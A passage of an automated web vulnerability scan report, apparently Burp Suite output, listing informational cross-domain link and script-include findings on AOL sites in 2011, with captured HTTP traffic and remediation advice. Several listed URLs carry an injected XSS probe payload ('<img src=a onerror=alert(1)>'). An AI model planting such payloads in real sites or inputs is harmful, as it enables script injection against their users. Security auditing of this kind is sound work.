<li class="first"><a href="http://www.mmawarehouse.com/Affliction-Georges-St-Pierre-GSP-Icon-UFC-129-Reve-p/aff-1404.htm?bid=2&aid=CD2&opt=" target="_blank">GSP UFC 129 Walkout Tee</a>
...[SNIP]...
<li><a href="http://www.mmawarehouse.com/Under-Armour-Georges-St-Pierre-GSP-Explosive-Bi-p/uax-1052.htm?bid=2&aid=CD2&opt=" target="_blank">Under Armour GSP Explosive T-Shirt</a>
...[SNIP]...
<li><a href="http://www.mmawarehouse.com/FDM-Jake-Shields-T-Shirt-p/fdm-1009.htm?bid=2&aid=CD2&opt=" target="_blank">FDM Jake Shields T-Shirt</a>
...[SNIP]...
<li><a href="http://www.mmawarehouse.com/Xtreme-Couture-Randy-Couture-UFC-129-Walkout-Tee-p/xtc-1020.htm?bid=2&aid=CD2&opt=" target="_blank">Randy Couture UFC 129 Walkout Tee</a>
...[SNIP]...
<li><a href="http://www.mmawarehouse.com/Dethrone-Jose-Aldo-Signature-Series-Tee-Limited-E-p/det-1110.htm?bid=2&aid=CD2&opt=" target="_blank">Jose Aldo Samurai Tee (Limited Edition)</a>
...[SNIP]...
<li><a href="http://www.mmawarehouse.com/Dethrone-Jose-Aldo-Signature-Series-Tee-p/det-1039.htm?bid=2&aid=CD2&opt=" target="_blank">Dethrone Jose Aldo Signature Tee</a>
...[SNIP]...
<li><a href="http://www.mmawarehouse.com/FORM-Athletics-Jon-Bones-Jones-UFC-128-Walkout-T-S-p/frm-1070.htm?bid=2&aid=CD2&opt=" target="_blank">Jones UFC 128 Walkout T-Shirt</a>
...[SNIP]...
<div class="votes">
<img src="http://www.aolcdn.com/fanhouse/design/v2/images/rate1.gif" alt="1 star" /> <span class="tools" id="tools_33956960">
...[SNIP]...
<a href="#" class="voteLink" id="vd33956960" onclick="voteComment('33956960','down'); return false;" title="Vote This Comment Down"><img id="vote_down" src="http://o.aolcdn.com/art/fanhouse/design/v2/images/cmnt-thumb-dn.gif" alt="vote down" /></a><a href="#" class="voteLink" id="vu33956960" onclick="voteComment('33956960','up'); return false;" title="Vote This Comment Up"><img id="vote_up" src="http://o.aolcdn.com/art/fanhouse/design/v2/images/cmnt-thumb-up.gif" alt="vote up" /></a> <a href="#" class="reportLink" id="r33956960" onclick="reportComment(33956960); return false" title="Report This Comment"><img src="http://o.aolcdn.com/art/fanhouse/design/v2/images/cmnt-report.gif" alt="Report" /></a>
...[SNIP]...
<div class="votes">
<img src="http://www.aolcdn.com/fanhouse/design/v2/images/rate3.gif" alt="3 stars" /> <span class="tools" id="tools_33957361">
...[SNIP]...
<a href="#" class="voteLink" id="vd33957361" onclick="voteComment('33957361','down'); return false;" title="Vote This Comment Down"><img id="vote_down" src="http://o.aolcdn.com/art/fanhouse/design/v2/images/cmnt-thumb-dn.gif" alt="vote down" /></a><a href="#" class="voteLink" id="vu33957361" onclick="voteComment('33957361','up'); return false;" title="Vote This Comment Up"><img id="vote_up" src="http://o.aolcdn.com/art/fanhouse/design/v2/images/cmnt-thumb-up.gif" alt="vote up" /></a> <a href="#" class="reportLink" id="r33957361" onclick="reportComment(33957361); return false" title="Report This Comment"><img src="http://o.aolcdn.com/art/fanhouse/design/v2/images/cmnt-report.gif" alt="Report" /></a>
...[SNIP]...
<div class="votes">
<img src="http://www.aolcdn.com/fanhouse/design/v2/images/rate3.gif" alt="3 stars" /> <span class="tools" id="tools_33959163">
...[SNIP]...
<a href="#" class="voteLink" id="vd33959163" onclick="voteComment('33959163','down'); return false;" title="Vote This Comment Down"><img id="vote_down" src="http://o.aolcdn.com/art/fanhouse/design/v2/images/cmnt-thumb-dn.gif" alt="vote down" /></a><a href="#" class="voteLink" id="vu33959163" onclick="voteComment('33959163','up'); return false;" title="Vote This Comment Up"><img id="vote_up" src="http://o.aolcdn.com/art/fanhouse/design/v2/images/cmnt-thumb-up.gif" alt="vote up" /></a> <a href="#" class="reportLink" id="r33959163" onclick="reportComment(33959163); return false" title="Report This Comment"><img src="http://o.aolcdn.com/art/fanhouse/design/v2/images/cmnt-report.gif" alt="Report" /></a>
...[SNIP]...
<div class="votes">
<img src="http://www.aolcdn.com/fanhouse/design/v2/images/rate3.gif" alt="3 stars" /> <span class="tools" id="tools_33958137">
...[SNIP]...
<a href="#" class="voteLink" id="vd33958137" onclick="voteComment('33958137','down'); return false;" title="Vote This Comment Down"><img id="vote_down" src="http://o.aolcdn.com/art/fanhouse/design/v2/images/cmnt-thumb-dn.gif" alt="vote down" /></a><a href="#" class="voteLink" id="vu33958137" onclick="voteComment('33958137','up'); return false;" title="Vote This Comment Up"><img id="vote_up" src="http://o.aolcdn.com/art/fanhouse/design/v2/images/cmnt-thumb-up.gif" alt="vote up" /></a> <a href="#" class="reportLink" id="r33958137" onclick="reportComment(33958137); return false" title="Report This Comment"><img src="http://o.aolcdn.com/art/fanhouse/design/v2/images/cmnt-report.gif" alt="Report" /></a>
...[SNIP]...
<div class="votes">
<img src="http://www.aolcdn.com/fanhouse/design/v2/images/rate3.gif" alt="3 stars" /> <span class="tools" id="tools_33959114">
...[SNIP]...
<a href="#" class="voteLink" id="vd33959114" onclick="voteComment('33959114','down'); return false;" title="Vote This Comment Down"><img id="vote_down" src="http://o.aolcdn.com/art/fanhouse/design/v2/images/cmnt-thumb-dn.gif" alt="vote down" /></a><a href="#" class="voteLink" id="vu33959114" onclick="voteComment('33959114','up'); return false;" title="Vote This Comment Up"><img id="vote_up" src="http://o.aolcdn.com/art/fanhouse/design/v2/images/cmnt-thumb-up.gif" alt="vote up" /></a> <a href="#" class="reportLink" id="r33959114" onclick="reportComment(33959114); return false" title="Report This Comment"><img src="http://o.aolcdn.com/art/fanhouse/design/v2/images/cmnt-report.gif" alt="Report" /></a>
...[SNIP]...
</div>

<script type="text/javascript" src="http://www.blogcdn.com/js/ajax_c.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://www.weblogsinc.com/b-c/sns.js"></script>
...[SNIP]...
<li><a href="http://twitter.com/mmafighting" title="Twitter" class="twttr">twitter</a></li>
       <li><a href="http://www.facebook.com/mmafighting" title="Facebook" class="fcbk">facebook</a>
...[SNIP]...
</h2>
<script language="JavaScript" type="text/javascript" src="http://admin.brightcove.com/js/BrightcoveExperiences.js"></script>
...[SNIP]...
<a href="http://www.mmafighting.com/photos/ufc-129-pictures-photos/" title="UFC 129 Pictures"><img src="http://www.blogcdn.com/www.mmafighting.com/media/2011/05/gspvsshieldsphotos132.jpg" alt="UFC 129 Pictures" /><div class="altCntnr">
...[SNIP]...
<a href="http://www.mmafighting.com/photos/yamato-damashii-pictures/" title="Japan Journey Pictures"><img src="http://www.blogcdn.com/www.mmafighting.com/media/2011/04/yamatodamashiidiaries87-1302894424.jpg" alt="Japan Journey Pictures" /><div class="altCntnr">
...[SNIP]...
<a href="http://www.mmafighting.com/photos/strikeforce-diaz-vs-daley-pictures" title="Strikeforce Pictures"><img src="http://www.blogcdn.com/www.mmafighting.com/media/2011/04/diazvsdaley13287.jpg" alt="Strikeforce Pictures" /><div class="altCntnr">
...[SNIP]...
<a href="http://www.mmafighting.com/photos/ufc-128-pictures-photos/" title="UFC 128 Pictures"><img src="http://www.blogcdn.com/www.mmafighting.com/media/2011/03/jonsovershogun132.jpg" alt="UFC 128 Pictures" /><div class="altCntnr">
...[SNIP]...
<a href="http://www.mmafighting.com/photos/ufc-127-pictures-photos" title="UFC 127 Photos"><img src="http://www.blogcdn.com/www.mmafighting.com/media/2011/02/pennvsfitch132-1298790818.jpg" alt="UFC 127 Photos" /><div class="altCntnr">
...[SNIP]...
<a href="http://www.mmafighting.com/photos/ufc-octagon-girls-australia-pictures" title="UFC Octagon Girl Photos"><img src="http://www.blogcdn.com/www.mmafighting.com/media/2011/02/ariannyceleste132.jpg" alt="UFC Octagon Girl Photos" /><div class="altCntnr">
...[SNIP]...
<div style="padding:7px 7px 11px;"><a href="http://www.mmawarehouse.com/?bid=2&aid=CD2&opt=" target="_blank"><img src="http://www.blogcdn.com/www.mmafighting.com/media/2011/02/mmawarehouse4.jpg" width="300px" height="250px" border="0" alt="MMA Clothing and More"/></a>
...[SNIP]...
</h2>
<script language="JavaScript" type="text/javascript" src="http://admin.brightcove.com/js/BrightcoveExperiences.js"></script>
...[SNIP]...
</object>
<a href="https://www.fightmagazine.com/mma-magazine/subscribe.asp?trackcode=AOL2011" target="_new" title="All Videos" class="AllVds">Get $5 off Fight Magazine subscription ..</a>
...[SNIP]...
</h2>
<a href="http://www.sportingnews.com/rss" title="Sporting News RSS Feed" class="fnhsFeed"><img src="http://o.aolcdn.com/art/ch_fanhouse/images/modules/ftrd_wrtrs/rss_feed.gif" alt="Sporting News RSS Feed" /></a>
<ul><li><a href="http://aol.sportingnews.com/nba/story/2011-05-03/nba-playoff-preview-mavericks-at-lakers-game-2" title="NBA playoff preview: Mavericks at Lakers, Game 2">NBA playoff preview: Mavericks at Lakers, Game 2</a>
...[SNIP]...
<li><a href="http://aol.sportingnews.com/nfl/story/2011-05-04/rashard-mendenhall-turns-to-blog-to-clarify-controversial-tweets" title="Rashard Mendenhall turns to blog to clarify controversial tweets">Rashard Mendenhall turns to blog to clarify controversial tweets</a>
...[SNIP]...
<li><a href="http://aol.sportingnews.com/nhl/story/2011-05-04/three-games-thre-major-issues-in-stanley-cup-playoffs" title="Three games, three major issues in Stanley Cup playoffs">Three games, three major issues in Stanley Cup playoffs</a>
...[SNIP]...
<li><a href="http://aol.sportingnews.com/nba/story/2011-05-03/sporting-news-player-of-the-year-derrick-rose" title="Player of the Year: Derrick Rose">Player of the Year: Derrick Rose</a>
...[SNIP]...
<li><a href="http://aol.sportingnews.com/nfl/story/2011-05-04/five-playoff-teams-still-have-big-need-to-fill" title="Five playoff teams still have big need to fill">Five playoff teams still have big need to fill</a>
...[SNIP]...
</ul>
<a href="http://aol.sportingnews.com/" title="View All Sporting Headlines" class="allHdlns">View All <span class="arrws">
...[SNIP]...
</h2>
<a href="http://rss.cnn.com/rss/si_mma.rss" title="Sports Illustrated MMA & Boxing RSS Feed" class="fnhsFeed"><img src="http://o.aolcdn.com/art/ch_fanhouse/images/modules/ftrd_wrtrs/rss_feed.gif" alt="Sports Illustrated MMA & Boxing RSS Feed" /></a>
<ul><li><a href="http://sportsillustrated.cnn.com/2011/writers/bryan_armen_graham/05/03/manny.pacquiao.shane.mosley.preview/index.html?xid=si_mma" title="Bryan Armen Graham: Crash Course: Manny Pacquiao vs. Shane Mosley">Bryan Armen Graham: Crash Course: Manny Pacquiao vs. Shane Mosley</a>
...[SNIP]...
<li><a href="http://sportsillustrated.cnn.com/2011/mma/boxing/05/04/pacquiao.mosley.ap/index.html?xid=si_mma" title="Pacquiao, Mosley ready for welterweight showdown">Pacquiao, Mosley ready for welterweight showdown</a>
...[SNIP]...
<li><a href="http://sportsillustrated.cnn.com/2011/writers/jeff_wagenheim/05/03/may.rankings/index.html?xid=si_mma" title="Jeff Wagenheim: Georges St-Pierre remains atop SI.com's May pound-for-pound ratings">Jeff Wagenheim: Georges St-Pierre remains atop SI.com's May pound-for-pound ratings</a>
...[SNIP]...
<li><a href="http://sportsillustrated.cnn.com/2011/mma/boxing/05/04/alvarez.rhodes.ap/index.html?xid=si_mma" title="Alvarez to defend title against Rhodes on June 18">Alvarez to defend title against Rhodes on June 18</a>
...[SNIP]...
</ul>
<a href="http://sportsillustrated.cnn.com/mma/" title="View All Sports Illustrated's MMA & Boxing Headlines" class="allHdlns">View All <span class="arrws">
...[SNIP]...
<li><a href="http://allelbows.com/" title="All Elbows">All Elbows</a></li><li><a href="http://www.bloodyelbow.com/" title="Bloody Elbow">Bloody Elbow</a>
...[SNIP]...
<li><a href="http://www.cagepotato.com/" title="Cage Potato">Cage Potato</a>
...[SNIP]...
<li><a href="http://www.fightlinker.com/" title="FightLinker">FightLinker</a>
...[SNIP]...
<li><a href="http://fightmetric.com/" title="FightMetric">FightMetric</a>
...[SNIP]...
<li><a href="http://www.lowkick.com/MMA" title="Low Kick">Low Kick</a></li><li><a href="http://middleeasy.com/" title="Middle Easy">Middle Easy</a>
...[SNIP]...
<li><a href="http://www.prommanow.com" title="Pro MMA Now">Pro MMA Now</a>
...[SNIP]...
<li><a href="http://www.ultimatefighter.com/" title="UltimateFighter.com">UltimateFighter.com</a>
...[SNIP]...
<div id="ftr">
                                   <a href="http://www.fanhouse.com/" title="MMA Fighting"><div id="chLogo" class="clrFx">
...[SNIP]...
<li><a href="http://www.mmawarehouse.com/">MMA Clothing</a>
...[SNIP]...
<li><a href="http://www.mmawarehouse.com/">MMA Gear</a></li>

<li><a href="http://www.mmawarehouse.com/">MMA Shorts</a>
...[SNIP]...
<li><a href="http://www.mmawarehouse.com/">MMA Gloves</a>
...[SNIP]...
<li><a href="http://www.mmawarehouse.com/">MMA Shirts</a>
...[SNIP]...
<li><a href="http://superbowlads.fanhouse.com">Super Bowl Ads</a>
...[SNIP]...
<li><a href="http://superbowlads.fanhouse.com">Super Bowl Commercials</a>
...[SNIP]...
<li><a href="http://realestate.aol.com/blog/2011/01/14/texas-super-bowl-rentals-royal-rip-off/">Super Bowl Rentals</a>
...[SNIP]...
<li><a href="http://www.tuaw.com/2011/02/04/planning-a-super-bowl-party-check-out-these-apps/">Super Bowl Trivia</a>
...[SNIP]...
<li><a href="http://www.tvsquad.com/2011/02/02/behind-the-scenes-at-puppy-bowl-vii/">Puppy Bowl</a>
...[SNIP]...
<li><a href="http://www.dailyfinance.com">Finance</a></li>

<li><a href="http://www.walletpop.com/blog/category/celebs-and-money/">Celebrity Money</a>
...[SNIP]...
<li><a href="http://smallbusiness.aol.com/">Small Business News</a>
...[SNIP]...
<li><a href="http://sports.cms.aol.com/dynapubcms/v3/#ww.bloggingstocks.com/">Stock News</a>
...[SNIP]...
<li><a href="http://www.gamedaily.com/">GameDaily</a>
...[SNIP]...
<li><a href="http://www.gnn.com/">Good News Now</a>
...[SNIP]...
<li><a href="http://www.luxist.com/">Luxist</a>
...[SNIP]...
<li><a href="http://about.aol.com/aolnetwork/mem_tos">Terms of Use</a>
...[SNIP]...
<li><a href="http://about.aol.com/aolnetwork/aol_pp">Privacy Policy</a>
...[SNIP]...
<li><a href="http://about.aol.com/aolnetwork/trademarks">Trademarks</a>
...[SNIP]...
<li><a href="http://help.aol.com">AOL A-Z HELP</a>
...[SNIP]...
</body>
<script src="http://o.aolcdn.com/os_merge/?file=/aol/jquery.getjs-1.0.min.js&file=/aol/jquery.inlinecss-1.0.min.js&file=/aol/jquery.sonar.min.js&file=/aol/jquery.facebooksocial.min.js" type="text/javascript"></script>
...[SNIP]...

16.96. http://yellowpages.aol.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://yellowpages.aol.com
Path:	/

Issue detail

The page was loaded from a URL containing a query string:

http://yellowpages.aol.com/?icid=navbar_YP_main5

The response contains the following links to other domains:

http://o.aolcdn.com/omniunih.js
http://o.aolcdn.com/yp/statics/aolyp/css131010/style.css
http://o.aolcdn.com/yp/statics/aolyp/img131010/yellowpages/YP_advert.gif
http://o.aolcdn.com/yp/statics/aolyp/img131010/yellowpages/close_loc.gif
http://o.aolcdn.com/yp/statics/aolyp/img131010/yellowpages/header_select.jpg
http://o.aolcdn.com/yp/statics/aolyp/js131010/i18ntext.js
http://o.aolcdn.com/yp/statics/aolyp/js131010/locmngr.js
http://o.aolcdn.com/yp/statics/aolyp/js131010/prototype.js
http://o.aolcdn.com/yp/statics/aolyp/js131010/yp.js
http://www.citysbest.com/
http://www.mapquest.com/
http://www.moviefone.com/
http://www.patch.com/
http://www.rentedspaces.com/
http://www.yellowpages.com/advertising/aol/

Request

Response

HTTP/1.1 200 OK
Date: Thu, 05 May 2011 00:59:14 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Set-Cookie: JSESSIONID=17224104F8E073DB96F56D00E1212059; Path=/yellowpages
Set-Cookie: recentSearches=; Domain=yellowpages.aol.com; Expires=Fri, 04-May-2012 00:59:15 GMT; Path=/
Set-Cookie: recentlocations=; Domain=yellowpages.aol.com; Expires=Fri, 04-May-2012 00:59:15 GMT; Path=/
Set-Cookie: reqId=ae3b17aa1bed2d84; Domain=yellowpages.aol.com; Path=/
Set-Cookie: sess_id=3fd40c2ad4939b38; Domain=yellowpages.aol.com; Expires=Thu, 05-May-2011 01:29:15 GMT; Path=/
Set-Cookie: local_guid=7b579074211441ec; Domain=yellowpages.aol.com; Expires=Fri, 04-May-2012 00:59:15 GMT; Path=/
Content-Length: 38832

<?xml version="1.0" encoding="UTF-8" ?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtm
...[SNIP]...
</script><script type="text/javascript"
   src="http://o.aolcdn.com/yp/statics/aolyp/js131010/prototype.js"></script><script type="text/javascript"
   src="http://o.aolcdn.com/yp/statics/aolyp/js131010/i18ntext.js" ></script><script type="text/javascript"
   src="http://o.aolcdn.com/yp/statics/aolyp/js131010/yp.js"></script><script type="text/javascript"
   src="http://o.aolcdn.com/yp/statics/aolyp/js131010/locmngr.js"></script><link href="http://o.aolcdn.com/yp/statics/aolyp/css131010/style.css"
   rel="stylesheet" type="text/css" /><link rel="SHORTCUT ICON" href="/favicon.ico" type="image/x-icon" />
...[SNIP]...
<div class="clear"><img src="http://o.aolcdn.com/yp/statics/aolyp/img131010/yellowpages/close_loc.gif" onclick="$('loc_mngr_div').hide()" alt="close"/></div>
...[SNIP]...
<td align="left" valign="middle"><img id="recLocBut" src="http://o.aolcdn.com/yp/statics/aolyp/img131010/yellowpages/header_select.jpg" alt="Select a location from your last searches" width="30" height="32" /></td>
...[SNIP]...
<div class="yellow_ad"><a href="http://www.yellowpages.com/advertising/aol/"><img src="http://o.aolcdn.com/yp/statics/aolyp/img131010/yellowpages/YP_advert.gif" alt="Advertise with Yellowpages" /></a>
...[SNIP]...
</a> | <a rel="nofollow"
href="http://www.citysbest.com/">City's Best</a> | <a rel="nofollow" href="http://www.patch.com/">Patch</a>
...[SNIP]...
</a> | <a rel="nofollow" href="http://www.moviefone.com/">Movies</a> | <a rel="nofollow" href="http://www.mapquest.com/">MapQuest</a>
...[SNIP]...
</a> | <a rel="nofollow" href="http://www.rentedspaces.com/">Rentals</a>
...[SNIP]...
</script><script type="text/javascript" src="http://o.aolcdn.com/omniunih.js"></script>
...[SNIP]...

17. Cross-domain script include previous next
There are 147 instances of this issue:

http://www.aim.com/products/express/
http://www.aol.com/
http://www.bankrate.com/funnel/mortgages/
http://www.blogsmithmedia.com/www.dailyfinance.com/media/dailyfinance.css
http://www.citysbest.com/
http://www.crunchboard.com/opening/detailjob.php
http://www.dabagirls.com/|http:/www.stylemepretty.com/|http:/stylehive.com|http:/stylelist.com|http:/www.outblush.com/|http:/www.dooce.com/|http:/www.mightygoods.com/|http:/www.coolmompicks.com|onemanga.com|psychcentral.com|webmail.aol.com|http:/www.weblogsinc.com|http:/www.webmd.com/$|wonderwall.msn.com|msn.com/wonderwall|v14.msn.com/|preview.msn.com/|www.msn.com/preview.aspx|mtv.com/videos/|mtv.com/
http://www.dailyfinance.com/
http://www.dailyfinance.com/markets/mostactives
http://www.dooce.com/|http:/www.mightygoods.com/|http:/www.coolmompicks.com|onemanga.com|psychcentral.com|webmail.aol.com|http:/www.weblogsinc.com|http:/www.webmd.com/$|wonderwall.msn.com|msn.com/wonderwall|v14.msn.com/|preview.msn.com/|www.msn.com/preview.aspx|mtv.com/videos/|mtv.com/
http://www.everydayhealth.com/allergy/climate-change-and-allergies.aspx
http://www.everydayhealth.com/heart-disease/cholesterol/drug-treatments-for-high-cholesterol.aspx
http://www.everydayhealth.com/kids-health/0504/tvs-common-in-daycare-centers-flouting-guidelines.aspx
http://www.everydayhealth.com/sexual-health/sexual-dysfunction/additional-treatments-for-female-sexual-arousal-disorder.aspx
http://www.facebook.com/
http://www.facebook.com/10000082482078341583%3Cimg%20src=a%20onerror=alert(1)%3Eab0e5e0e0bd
http://www.facebook.com/10000082482078341583<img%20src=a%20onerror=alert(1
http://www.facebook.com/10000082482078341583<img%20src=a%20onerror=alert(1)>ab0e5e0e0bd
http://www.facebook.com/1242845259
http://www.facebook.com/1242845259e76bc%3Cimg%20src=a%20onerror=alert(1)%3Eb0233c9330b
http://www.facebook.com/2008/fbml
http://www.facebook.com/AOLrealestate
http://www.facebook.com/BPAmerica
http://www.facebook.com/DailyFinance
http://www.facebook.com/HockeyKen
http://www.facebook.com/KickIceForever
http://www.facebook.com/LadyBonesie
http://www.facebook.com/Loizza
http://www.facebook.com/aim
http://www.facebook.com/ajax/intl/language_dialog.php
http://www.facebook.com/aol
http://www.facebook.com/aolradio
http://www.facebook.com/burkerkink
http://www.facebook.com/careers/
http://www.facebook.com/deedee.perez1
http://www.facebook.com/directory/pages/
http://www.facebook.com/directory/people/
http://www.facebook.com/facebook
http://www.facebook.com/fayse
http://www.facebook.com/find-friends
http://www.facebook.com/find-friends
http://www.facebook.com/gale.l.schenk
http://www.facebook.com/help/
http://www.facebook.com/help/
http://www.facebook.com/izaOllie
http://www.facebook.com/jezzas
http://www.facebook.com/kimberly.christ
http://www.facebook.com/ladonna.lokey
http://www.facebook.com/lakendra.roberts
http://www.facebook.com/login.php
http://www.facebook.com/matthew.oliveira2
http://www.facebook.com/mmafighting
http://www.facebook.com/mobile/
http://www.facebook.com/pages/Barnesville/115038011847083
http://www.facebook.com/pages/Beacon-of-Hope-Resource-Center/34194116820
http://www.facebook.com/pages/Bernicks-Pepsi/123296084349478
http://www.facebook.com/pages/Blaine-Senior-High/106189406087059
http://www.facebook.com/pages/Editor-in-Chief/137829579583400
http://www.facebook.com/pages/Gilco-Corporation/109823499042436
http://www.facebook.com/pages/HMFIC/149403761740008
http://www.facebook.com/pages/Manchester-Connecticut/112527912096312
http://www.facebook.com/pages/Merchandiser/123981654314779
http://www.facebook.com/pages/New-Haven-College/130105783687523
http://www.facebook.com/pages/Northern-Illinois-University/108155335871674
http://www.facebook.com/pages/San-Antonio-Texas/110297742331680
http://www.facebook.com/pages/School-of-Hard-Knocks-University-of-Life/115228431825707
http://www.facebook.com/pages/Sporting-News/104068362964496
http://www.facebook.com/pages/ToP-SeCNeT/195242630519520
http://www.facebook.com/pages/University-of-Chicago-Semester-in-Madrid/144554762263161
http://www.facebook.com/pages/create.php
http://www.facebook.com/pages/memorial-high-school-west-new-york-nj/114508558584580
http://www.facebook.com/patroyo
http://www.facebook.com/people/Alexander-Bucky-Jordan/1242845259
http://www.facebook.com/people/Alexander-Bucky-Jordan/1242845259
http://www.facebook.com/people/Bucky-Jordan/100000824820783
http://www.facebook.com/plugins/activity.php
http://www.facebook.com/plugins/activity.php
http://www.facebook.com/plugins/comments.php
http://www.facebook.com/plugins/comments.php
http://www.facebook.com/plugins/facepile.php
http://www.facebook.com/plugins/facepile.php
http://www.facebook.com/plugins/like.php
http://www.facebook.com/plugins/likebox.php
http://www.facebook.com/plugins/likebox.php
http://www.facebook.com/plugins/recommendations.php
http://www.facebook.com/plugins/recommendations.php
http://www.facebook.com/plugins/send.php
http://www.facebook.com/plugins/send.php
http://www.facebook.com/policy.php
http://www.facebook.com/privacy/explanation.php
http://www.facebook.com/r.php
http://www.facebook.com/r.php
http://www.facebook.com/robynalys
http://www.facebook.com/share.php
http://www.facebook.com/sharer.php
http://www.facebook.com/skdarealist
http://www.facebook.com/sportingnews
http://www.facebook.com/stefanoboscolomarchi
http://www.facebook.com/techcrunch
http://www.facebook.com/terms.php
http://www.facebook.com/terms.php
http://www.facebook.com/theteebers
http://www.facebook.com/wmoppert
https://www.fightmagazine.com/mma-magazine/subscribe.asp
http://www.games.com/browse-games/all/
http://www.games.com/game-play/family-feud/single
http://www.games.com/game/family-feud/
https://www.godaddy.com/
https://www.godaddy.com/domains/search.aspx
https://www.godaddy.com/gdshop/hosting/landing.asp
http://www.huffingtonpost.com/
http://www.huffingtonpost.com/2011/05/02/
http://www.huffingtonpost.com/2011/05/02/holocaust-memorial-day_n_856638.html
http://www.huffingtonpost.com/2011/05/04/
http://www.huffingtonpost.com/2011/05/04/cnn-poll-finds-that-most-_n_857597.html
http://www.huffingtonpost.com/2011/05/04/osama-bin-laden-pictures_n_857568.html
http://www.huffingtonpost.com/advertise/
http://www.huffingtonpost.com/imam-feisal-abdul-rauf/bin-laden-terrorism_b_857345.html
http://www.huffingtonpost.com/newsinc/landing_page.html
http://www.huffingtonpost.com/permalink-tracker.html
http://www.huffingtonpost.com/rep-carolyn-maloney/the-cfpb-needs-to-get-to_b_857393.html
http://www.huffingtonpost.com/users/logout/
http://www.lakewoodbeacon.org/
http://www.mapquest.com/
http://www.mapquest.com/directions
http://www.mapquest.com/maps
http://www.mapquest.com/routeplanner
http://www.marketwatch.com/News/Story/Story.aspx
http://www.mmafighting.com/
http://www.mmafighting.com/2011/05/03/sources-fedor-hendo-fight-could-be-announced-within-24-72-hours/
http://www.mmafighting.com/2011/05/04/former-nhl-enforcer-donald-brashear-to-fight-at-ringside-mma-11/
http://www.mmawarehouse.com/
http://www.mmawarehouse.com/Affliction-Georges-St-Pierre-GSP-Icon-UFC-129-Reve-p/aff-1404.htm
http://www.mmawarehouse.com/Dethrone-Jose-Aldo-Signature-Series-Tee-Limited-E-p/det-1110.htm
http://www.mmawarehouse.com/Dethrone-Jose-Aldo-Signature-Series-Tee-p/det-1039.htm
http://www.mmawarehouse.com/FDM-Jake-Shields-T-Shirt-p/fdm-1009.htm
http://www.mmawarehouse.com/FORM-Athletics-Jon-Bones-Jones-UFC-128-Walkout-T-S-p/frm-1070.htm
http://www.mmawarehouse.com/Under-Armour-Georges-St-Pierre-GSP-Explosive-Bi-p/uax-1052.htm
http://www.mmawarehouse.com/Xtreme-Couture-Randy-Couture-UFC-129-Walkout-Tee-p/xtc-1020.htm
http://www.moviefone.com/
http://www.outblush.com/|http:/www.dooce.com/|http:/www.mightygoods.com/|http:/www.coolmompicks.com|onemanga.com|psychcentral.com|webmail.aol.com|http:/www.weblogsinc.com|http:/www.webmd.com/$|wonderwall.msn.com|msn.com/wonderwall|v14.msn.com/|preview.msn.com/|www.msn.com/preview.aspx|mtv.com/videos/|mtv.com/
http://www.popeater.com/
http://www.truveo.com/
http://www.truveo.com/client/versions/univ_ent/js/truveo.libs.util.v1304543460.js
http://www.truveo.com/search
http://www.tuaw.com/hub/app-reviews
http://yellowpages.aol.com/

Issue background

When an application includes a script from an external domain, this script is executed by the browser within the security context of the invoking application. The script can therefore do anything that the application's own scripts can do, such as accessing application data and performing actions within the context of the current user.

If you include a script from an external domain, then you are trusting that domain with the data and functionality of your application, and you are trusting the domain's own security to prevent an attacker from modifying the script to perform malicious actions within your application.

Issue remediation

Scripts should not be included from untrusted domains. If you have a requirement which a third-party script appears to fulfil, then you should ideally copy the contents of that script onto your own domain and include it from there. If that is not possible (e.g. for licensing reasons) then you should consider reimplementing the script's functionality within your own code.

17.1. http://www.aim.com/products/express/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.aim.com
Path:	/products/express/

Issue detail

The response dynamically includes the following scripts from other domains:

http://o.aolcdn.com/os/aim_web/aimcom/jquery.js
http://o.aolcdn.com/os/aim_web/aimcom/main.js
http://s2c.aol.com/s2cw/js/jquery.simplemodal.min.js
http://s2c.aol.com/s2cw/js/mc.s2c.min.js

Request

GET /products/express/ HTTP/1.1
Host: www.aim.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Thu, 05 May 2011 00:56:51 GMT
Server: Apache
Content-Type: text/html
Content-Length: 8466

<html>
<head>
<link href="http://o.aolcdn.com/os/aim_web/img/favicon.ico" rel="shortcut icon" type="image/x-icon" />
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>AIM -
...[SNIP]...
<link href="http://o.aolcdn.com/os/aim_web/aimcom/main.css" rel="stylesheet" type="text/css" />
<script type="text/javascript" src="http://o.aolcdn.com/os/aim_web/aimcom/jquery.js"></script>
<script type="text/javascript" src="http://o.aolcdn.com/os/aim_web/aimcom/main.js"></script>
...[SNIP]...
</div>
<script type="text/javascript" src="http://s2c.aol.com/s2cw/js/jquery.simplemodal.min.js" charset="UTF-8" /></script>
<script type="text/javascript" src="http://s2c.aol.com/s2cw/js/mc.s2c.min.js" charset="UTF-8" /></script>
...[SNIP]...

17.2. http://www.aol.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.aol.com
Path:	/

Issue detail

The response dynamically includes the following scripts from other domains:

http://o.aolcdn.com/ads/adsWrapper.js
http://o.aolcdn.com/omniunih.js
http://o.aolcdn.com/videoplayer/loader.js
http://platform.twitter.com/widgets.js
http://player.play.it/player/launchAolPlayer.js
http://portal.aolcdn.com/p5/_v42.5/js/override.60241.main.js

Request

Response

HTTP/1.1 200 OK
Date: Thu, 05 May 2011 00:56:20 GMT
Server: Apache-Coyote/1.1
Pragma: no-cache
Cache-Control: no-cache, no-store, private, max-age=0
Expires: 0
R-Host: vm-149-174-25-43.asset.aol.com
Content-Type: text/html;;charset=utf-8
Set-Cookie: JSESSIONID=22E4AF9938869340AC16AB3164A9DDA5; Path=/aol
